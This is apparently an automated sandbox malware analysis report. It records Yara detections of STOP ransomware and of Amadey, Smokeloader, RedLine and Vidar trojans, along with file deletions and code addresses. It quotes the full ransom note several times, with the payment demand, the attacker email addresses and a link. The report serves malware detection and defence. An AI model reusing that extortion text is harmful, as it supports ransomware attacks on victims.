Source: Yara match	File source: 36.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.958B.exe.23d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.958B.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.958B.exe.23f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2730009741.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2645253997.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.2820154194.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2749135965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2663864703.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.4499782205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.4499830206.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 958B.exe PID: 3636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 958B.exe PID: 4708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 958B.exe PID: 5664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 958B.exe PID: 3292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 958B.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 958B.exe PID: 3648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 958B.exe PID: 4416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 958B.exe PID: 4280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 958B.exe PID: 5788, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\Temp\958B.exe	File moved: C:\Users\user\Desktop\EFOYFBOLXA\EOWRVPQCCS.mp3
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File deleted: C:\Users\user\Desktop\EFOYFBOLXA\EOWRVPQCCS.mp3
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File moved: C:\Users\user\Desktop\TQDFJHPUIU.jpg
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File deleted: C:\Users\user\Desktop\TQDFJHPUIU.jpg
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File moved: C:\Users\user\Desktop\EIVQSAOTAQ.jpg

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\AppData\Local\Temp\958B.exe	File dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-xn3vuzql0aprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0805josieh5geqfet71y3xooh3oktw1e6ktqwyzciyntqnfx5	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File dropped: C:\$WinREAgent\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-xn3vuzql0aprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0805josieh5geqfet71y3xooh3oktw1e6ktqwyzciyntqnfx5	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File dropped: C:\$WinREAgent\Scratch\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-xn3vuzql0aprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0805josieh5geqfet71y3xooh3oktw1e6ktqwyzciyntqnfx5	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-xn3vuzql0aprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0805josieh5geqfet71y3xooh3oktw1e6ktqwyzciyntqnfx5	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 35.2.yiueea.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 22.0.C5F5.exe.a20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 36.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 36.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 39.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 39.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 43.2.958B.exe.23215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 43.2.958B.exe.23215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.958B.exe.23f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.958B.exe.23f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 37.2.958B.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 37.2.958B.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 43.2.958B.exe.23215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 43.2.958B.exe.23215a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 20.2.958B.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 20.2.958B.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.yiueea.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 14.2.958B.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.958B.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.958B.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.958B.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.0.yiueea.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 35.0.yiueea.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 36.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 36.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 20.2.958B.exe.23d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 20.2.958B.exe.23d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 37.2.958B.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 37.2.958B.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 22.2.C5F5.exe.a20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 39.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 39.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.958B.exe.23f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.958B.exe.23f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.2123468725.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000017.00000000.2636460288.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000025.00000002.2729815222.00000000006BB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.2663695753.0000000002306000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000000.2629932505.0000000000A21000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000016.00000002.2638422525.0000000000A21000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000026.00000002.2802563132.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2370688498.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000002A.00000002.2774337938.000000000256D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000026.00000002.2802667211.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2370560967.0000000000628000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000025.00000002.2730009741.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000026.00000002.2803018648.00000000008E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000014.00000002.2645253997.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000017.00000002.4498779959.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000000.00000002.2123714329.00000000008EA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2370773420.0000000002121000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000002B.00000002.2816735837.0000000000891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002B.00000002.2820154194.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.2123563075.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000027.00000002.2749135965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000027.00000002.2749135965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000E.00000002.2663864703.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000023.00000000.2656436321.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000000.00000002.2123436882.0000000000840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2370645961.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2558233012.0000000002263000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000024.00000002.4499782205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000024.00000002.4499782205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000014.00000002.2644967918.0000000002231000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000026.00000002.2802808021.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000023.00000002.2658515111.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000028.00000002.4506386571.0000000004D96000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000018.00000002.4499830206.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000018.00000002.4499830206.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: Process Memory Space: 958B.exe PID: 3636, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 958B.exe PID: 4708, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 958B.exe PID: 5664, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 958B.exe PID: 3292, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 958B.exe PID: 3848, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 958B.exe PID: 3648, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 958B.exe PID: 4416, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 958B.exe PID: 4280, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 958B.exe PID: 5788, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: build2.exe PID: 5428, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe, type: DROPPED	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe, type: DROPPED	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown

.NET source code contains very large array initializations

Source: 9.2.A079.exe.671000.1.raw.unpack, dnlibDotNetFieldAttributesb.cs

Large array initialization: _202C_202B_206C_202E_206E_206D_200B_200D_206E_202B_202E_206F_206B_200E_202A_202A_200D_202B_206B_200D_200F_202B_206B_202C_202A_200D_206E_200D_202E_202B_206A_206B_202B_206C_200E_202E_206F_202C_202B_202D_202E: array initializer size 2384

Source: C:\Users\user\AppData\Local\Temp\A079.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6364 -s 272

Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_00413541	7_2_00413541
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_004115FD	7_2_004115FD
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_00411B41	7_2_00411B41
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_0041277D	7_2_0041277D
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_00407B17	7_2_00407B17
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F7220	7_2_023F7220
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_024722C0	7_2_024722C0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_0243E37C	7_2_0243E37C
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F7393	7_2_023F7393
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023FA026	7_2_023FA026
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023FB000	7_2_023FB000
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_0240F030	7_2_0240F030
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023FB0B0	7_2_023FB0B0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_024000D0	7_2_024000D0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F30F0	7_2_023F30F0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F70E0	7_2_023F70E0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_0243E141	7_2_0243E141
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F9120	7_2_023F9120
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_0241D1A4	7_2_0241D1A4
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023FA699	7_2_023FA699
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_0243B69F	7_2_0243B69F
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023FE6E0	7_2_023FE6E0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023FC760	7_2_023FC760
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023FA79A	7_2_023FA79A
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_0241D7F1	7_2_0241D7F1
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F3520	7_2_023F3520
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F7520	7_2_023F7520
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023FCA10	7_2_023FCA10
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F7A80	7_2_023F7A80
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_02400B00	7_2_02400B00
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F2B60	7_2_023F2B60
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023FDBE0	7_2_023FDBE0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_024118D0	7_2_024118D0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F7880	7_2_023F7880
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023FA916	7_2_023FA916
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F59F7	7_2_023F59F7
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_0241E9A3	7_2_0241E9A3
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F89D0	7_2_023F89D0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_0241F9B0	7_2_0241F9B0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F8E60	7_2_023F8E60
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_02424E9F	7_2_02424E9F
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_02432D1E	7_2_02432D1E
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F5DF7	7_2_023F5DF7
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F5DE7	7_2_023F5DE7
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0040D240	8_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00419F90	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0040C070	8_2_0040C070
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0042E003	8_2_0042E003
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00408030	8_2_00408030
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00410160	8_2_00410160
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_004021C0	8_2_004021C0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0044237E	8_2_0044237E
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_004084C0	8_2_004084C0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_004344FF	8_2_004344FF
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0043E5A3	8_2_0043E5A3
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0040A660	8_2_0040A660
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0041E690	8_2_0041E690
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00406740	8_2_00406740
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00402750	8_2_00402750
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0040A710	8_2_0040A710
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00408780	8_2_00408780
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0042C804	8_2_0042C804
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00406880	8_2_00406880
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_004349F3	8_2_004349F3
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_004069F3	8_2_004069F3
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00402B80	8_2_00402B80
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00406B80	8_2_00406B80
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0044ACFF	8_2_0044ACFF
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0042CE51	8_2_0042CE51
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00434E0B	8_2_00434E0B
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00406EE0	8_2_00406EE0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00420F30	8_2_00420F30
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00405057	8_2_00405057
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0042F010	8_2_0042F010
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_004070E0	8_2_004070E0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_004391F6	8_2_004391F6
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00435240	8_2_00435240
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_004C9343	8_2_004C9343
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00405447	8_2_00405447
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00405457	8_2_00405457
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00449506	8_2_00449506
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0044B5B1	8_2_0044B5B1
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00435675	8_2_00435675
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00409686	8_2_00409686
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0040F730	8_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0044D7A1	8_2_0044D7A1
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00481920	8_2_00481920
